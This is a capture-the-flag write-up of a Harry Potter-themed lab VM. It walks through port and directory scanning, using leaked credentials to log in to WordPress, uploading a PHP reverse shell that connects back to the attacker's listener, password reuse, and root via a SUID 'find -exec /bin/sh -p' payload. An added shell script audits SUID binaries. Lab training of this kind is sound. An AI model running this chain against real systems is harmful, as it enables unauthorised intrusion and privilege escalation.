First steps: port scanning with nmap, or you can use recon to save some time and carry on with your other tasks while it runs

┌──(root@ghost)-[/home/ghost]
└─# recon dobby.vuln

    .o oOOOOOOOo                                            OOOo
    Ob.OOOOOOOo  OOOo.      oOOo.                      .adOOOOOOO
    OboO"""""""""""".OOo. .oOOOOOo.    OOOo.oOOOOOo.."""""""""'OO
    OOP.oOOOOOOOOOOO "POOOOOOOOOOOo.   `"OOOOOOOOOP,OOOOOOOOOOOB'
    `O'OOOO'     `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO'    `OOOOo
    .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `OO
    OOOOO                 '"OOOOOOOOOOOOOOOO"`                oOO
   oOOOOOba.                .adOOOOOOOOOOba               .adOOOOo.
  oOOOOOOOOOOOOOba.    .adOOOOOOOOOO@^OOOOOOOba.     .adOOOOOOOOOOOO
 OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"`  '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
 "OOOO"       "YOoOOOOMOIONODOO"`  .   '"OOROAOPOEOOOoOY"     "OOO"
    Y           'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?'         :`
    :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?         .
    .            oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
                 '%o  OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
                      `$"  `OOOO' `O"Y ' `OOOO'  o             .
    .                  .     OP"          : o     .
                              :
                              .

[R3C0N] by 0bfxgh0st 4 WWA with ❤
Can you boost me? Can you bring me the keys? Can you make an autopwn for me? Can you CVE-me? Can you? GatoGamer1155

[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-11 18:59 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 18:59
Completed NSE at 18:59, 0.00s elapsed
Initiating ARP Ping Scan at 18:59
Scanning dobby.vuln (10.0.2.5) [1 port]
Completed ARP Ping Scan at 18:59, 0.01s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 18:59
Scanning dobby.vuln (10.0.2.5) [65535 ports]
Discovered open port 80/tcp on 10.0.2.5
Completed SYN Stealth Scan at 18:59, 1.44s elapsed (65535 total ports)
NSE: Script scanning 10.0.2.5.
Initiating NSE at 18:59
Completed NSE at 18:59, 0.00s elapsed
Nmap scan report for dobby.vuln (10.0.2.5)
Host is up (0.000069s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:DE:CB:F6 (Oracle VirtualBox virtual NIC)

NSE: Script Post-scanning.
Initiating NSE at 18:59
Completed NSE at 18:59, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.63 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)


[+] [fuzzin server]
http://dobby.vuln [200 OK] Apache[2.4.46], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.46 (Ubuntu)], IP[10.0.2.5], Title[Draco:dG9vIGVhc3kgbm8/IFBvdHRlcg==]

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Jul 11 18:59:59 2022
URL_BASE: http://dobby.vuln:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://dobby.vuln:80/ ----
+ http://dobby.vuln:80/index.html (CODE:200|SIZE:10977)                                                                                                                                           
+ http://dobby.vuln:80/log (CODE:200|SIZE:45)                                                                                                                                                     
+ http://dobby.vuln:80/phpinfo.php (CODE:200|SIZE:83274)                                                                                                                                          
+ http://dobby.vuln:80/server-status (CODE:403|SIZE:275)                                                                                                                                          
                                                                                                                                                                                                  
-----------------
END_TIME: Mon Jul 11 19:00:01 2022
DOWNLOADED: 4612 - FOUND: 4

It seems there is only a web server on port 80 (HTTP)

┌──(root@ghost)-[/home/ghost]
└─# curl "http://dobby.vuln"

    <!--
     See: /alohomora
    -->
┌──(root@ghost)-[/home/ghost]
└─# curl "http://dobby.vuln/alohomora/"
Draco's password is his house ;)
┌──(root@ghost)-[/home/ghost]
└─# curl "http://dobby.vuln/log"
pass:OjppbGlrZXNvY2tz

hint --> /DiagonAlley

After scraping some directories we obtain two more paths: from them we can guess Draco's password is slytherin, and the log exposes a base64-encoded password, ilikesocks. Time to dig into DiagonAlley for more information; there we will find a WordPress blog, which should give us a place to log in

┌──(root@ghost)-[/home/ghost]
└─# whatweb "http://dobby.vuln/DiagonAlley/"
http://dobby.vuln/DiagonAlley/ [200 OK] Apache[2.4.46], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.46 (Ubuntu)], IP[10.0.2.5], JQuery, MetaGenerator[WordPress 5.5.3], Script[text/javascript], Title[Daily Prophet – News of wizard], UncommonHeaders[link], WordPress[5.5.3]

We are up against a WordPress blog, so we can use tools like wpscan and fuzz for the usual WordPress directories

┌──(root@ghost)-[/home/ghost]
└─# wpscan -e u,p "http://dobby.vuln/DiagonAlley/"
[i] User(s) Identified:

[+] draco
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dobby.vuln/DiagonAlley/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[+] Draco
 | Found By: Rss Generator (Passive Detection)
 
┌──(root@ghost)-[/home/ghost]
└─# dirb "http://dobby.vuln/DiagonAlley/" /usr/share/dirb/wordlists/common.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Jul 11 19:51:03 2022
URL_BASE: http://dobby.vuln/DiagonAlley/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://dobby.vuln/DiagonAlley/ ----
+ http://dobby.vuln/DiagonAlley/index.php (CODE:301|SIZE:0)                                                                                                                                       
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-admin/                                                                                                                                            
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-content/                                                                                                                                          
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-includes/                                                                                                                                         
+ http://dobby.vuln/DiagonAlley/xmlrpc.php (CODE:405|SIZE:42)                                                                                                                                     
                                                                                                                                                                                                  
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-admin/ ----
+ http://dobby.vuln/DiagonAlley/wp-admin/admin.php (CODE:302|SIZE:0)                                                                                                                              
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-admin/css/                                                                                                                                        
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-admin/images/                                                                                                                                     
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-admin/includes/                                                                                                                                   
+ http://dobby.vuln/DiagonAlley/wp-admin/index.php (CODE:302|SIZE:0)                                                                                                                              
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-admin/js/                                                                                                                                         
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-admin/maint/                                                                                                                                      
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-admin/network/                                                                                                                                    
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-admin/user/                                                                                                                                       
                                                                                                                                                                                                  
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-content/ ----
+ http://dobby.vuln/DiagonAlley/wp-content/index.php (CODE:200|SIZE:0)                                                                                                                            
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-content/languages/                                                                                                                                
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-content/plugins/                                                                                                                                  
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-content/themes/                                                                                                                                   
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-content/upgrade/                                                                                                                                  
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-content/uploads/                                                                                                                                  
                                                                                                                                                                                                  
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                  
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                  
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                  
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                  
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                  
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                  
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-admin/network/ ----
+ http://dobby.vuln/DiagonAlley/wp-admin/network/admin.php (CODE:302|SIZE:0)                                                                                                                      
+ http://dobby.vuln/DiagonAlley/wp-admin/network/index.php (CODE:302|SIZE:0)                                                                                                                      
                                                                                                                                                                                                  
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-admin/user/ ----
+ http://dobby.vuln/DiagonAlley/wp-admin/user/admin.php (CODE:302|SIZE:0)                                                                                                                         
+ http://dobby.vuln/DiagonAlley/wp-admin/user/index.php (CODE:302|SIZE:0)                                                                                                                         
                                                                                                                                                                                                  
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-content/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                  
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-content/plugins/ ----
+ http://dobby.vuln/DiagonAlley/wp-content/plugins/index.php (CODE:200|SIZE:0)                                                                                                                    
                                                                                                                                                                                                  
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-content/themes/ ----
+ http://dobby.vuln/DiagonAlley/wp-content/themes/index.php (CODE:200|SIZE:0)                                                                                                                     
                                                                                                                                                                                                  
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                  
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Mon Jul 11 19:51:13 2022
DOWNLOADED: 32284 - FOUND: 11

We have enough information and finally a place to log in. Now we log in at http://dobby.vuln/DiagonAlley/wp-login.php with user draco and password slytherin. Then it's time to upload our favourite PHP shell; I will use ShellStorm to generate one

┌──(root@ghost)-[/home/ghost]
└─# shellstorm.sh php-daemon 10.0.2.15 1337 > rev.php

After uploading our rev.php as a new theme and setting up our netcat listener, we curl http://dobby.vuln/DiagonAlley/wp-content/uploads/2022/07/rev.php to execute it and get our shell on the system

┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
listening on [any] 1337 ...
connect to [10.0.2.6] from dobby.vuln [10.0.2.5] 42946
Linux HogWarts 5.8.0-26-generic #27-Ubuntu SMP Wed Oct 21 22:29:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 02:30:10 up  2:47,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

We are in the server; getting a user account should be easy by recycling passwords

www-data@HogWarts:/$ su dobby
Password: 
dobby@HogWarts:/$ more /home/dobby/flag1.txt
"Harry potter this year should not go to the school of wizardry"

flag1{28327a4964cb391d74111a185a5047ad}
dobby@HogWarts:/$

Logged in as dobby with password ilikesocks, and here is the user flag; time to elevate our privileges

dobby@HogWarts:/$ find / -type f -perm /6000 2>/dev/null
/usr/bin/su
/usr/bin/passwd
/usr/bin/crontab
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/base32
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/find
/usr/bin/expiry
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/write.ul
/usr/bin/mount
/usr/bin/wall
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/fusermount

We are looking for SUID programs and found the find command, which is interesting. Checking GTFOBins (or the gtfobins-webcrawler documentation) we find a useful payload
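From the other side of the fence, the listing above is exactly what a SUID audit should catch: find and base32 do not carry the SUID bit on a stock install. The script below is an added example, not part of the original writeup; it diffs the output of the same `find` enumeration against a baseline, and the baseline list is my assumption of a clean Ubuntu 20.04 image, not taken from the box.

```shell
#!/bin/sh
# Added SUID/SGID audit (not from the original writeup): compares what
# `find / -type f -perm /6000` reports against a baseline of binaries a
# stock Ubuntu 20.04 install is expected to carry, and reports the extras.
# The baseline is an assumption for this example; build yours from a clean
# install of the same image instead of copying this list.
BASELINE_SUID='/usr/bin/su
/usr/bin/passwd
/usr/bin/crontab
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/expiry
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/write.ul
/usr/bin/mount
/usr/bin/wall
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/fusermount'

# audit_suid: reads one path per line on stdin, prints every path missing
# from the baseline, and returns 1 if any was seen (0 otherwise) so it can
# gate a cron job or a CI check.
audit_suid() {
    unexpected=0
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        if ! printf '%s\n' "$BASELINE_SUID" | grep -Fxq -- "$path"; then
            printf '%s\n' "$path"
            unexpected=$((unexpected + 1))
        fi
    done
    [ "$unexpected" -eq 0 ]
}

# scan_live: the enumeration the writeup used, limited to the root filesystem.
scan_live() {
    find / -xdev -type f -perm /6000 2>/dev/null | audit_suid
}

# Constructed sample: a subset of the listing shown above in the writeup.
SAMPLE_LISTING='/usr/bin/su
/usr/bin/passwd
/usr/bin/base32
/usr/bin/find
/usr/bin/pkexec
/usr/bin/fusermount'

echo "SUID/SGID binaries outside the baseline:"
printf '%s\n' "$SAMPLE_LISTING" | audit_suid || echo "-> review each one and drop the bit with: chmod u-s,g-s <path>"
```

Run `scan_live` instead of the sample to check a real host; a non-zero exit means something outside the baseline was found.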

dobby@HogWarts:/$ find . -exec /bin/sh -p \; -quit
# whoami
root
# ls -la /root
total 36
drwx------  5 root root 4096 jul 11 23:48 .
drwxr-xr-x 20 root root 4096 nov  7  2020 ..
-rw-------  1 root root  162 nov  7  2020 .bash_history
-rw-r--r--  1 root root 3106 ago 14  2019 .bashrc
drwx------  2 root root 4096 oct 22  2020 .cache
drwxr-xr-x  3 root root 4096 nov  7  2020 .local
-rw-r--r--  1 root root  161 sep 16  2020 .profile
-rw-r--r--  1 root root 1359 nov  7  2020 proof.txt
drwx------  3 root root 4096 jul 11 23:48 snap
# more /root/proof.txt
                                         _ __
        ___                             | '  \
   ___  \ /  ___         ,'\_           | .-. \        /|
   \ /  | |,'__ \  ,'\_  |   \          | | | |      ,' |_   /|
 _ | |  | |\/  \ \ |   \ | |\_|    _    | |_| |   _ '-. .-',' |_   _
// | |  | |____| | | |\_|| |__    //    |     | ,'_`. | | '-. .-',' `. ,'\_
\\_| |_,' .-, _  | | |   | |\ \  //    .| |\_/ | / \ || |   | | / |\  \|   \
 `-. .-'| |/ / | | | |   | | \ \//     |  |    | | | || |   | | | |_\ || |\_|
   | |  | || \_| | | |   /_\  \ /      | |`    | | | || |   | | | .---'| |
   | |  | |\___,_\ /_\ _      //       | |     | \_/ || |   | | | |  /\| |
   /_\  | |           //_____//       .||`      `._,' | |   | | \ `-' /| |
        /_\           `------'        \ |   AND        `.\  | |  `._,' /_\
                                       \|       THE          `.\
                                            _  _  _  _  __ _  __ _ /_
                                           (_`/ \|_)/ '|_ |_)|_ |_)(_
                                           ._)\_/| \\_,|__| \|__| \ _)
                                                           _ ___ _      _
                                                          (_` | / \|\ ||__
                                                          ._) | \_/| \||___


root{63a9f0ea7bb98050796b649e85481845!!}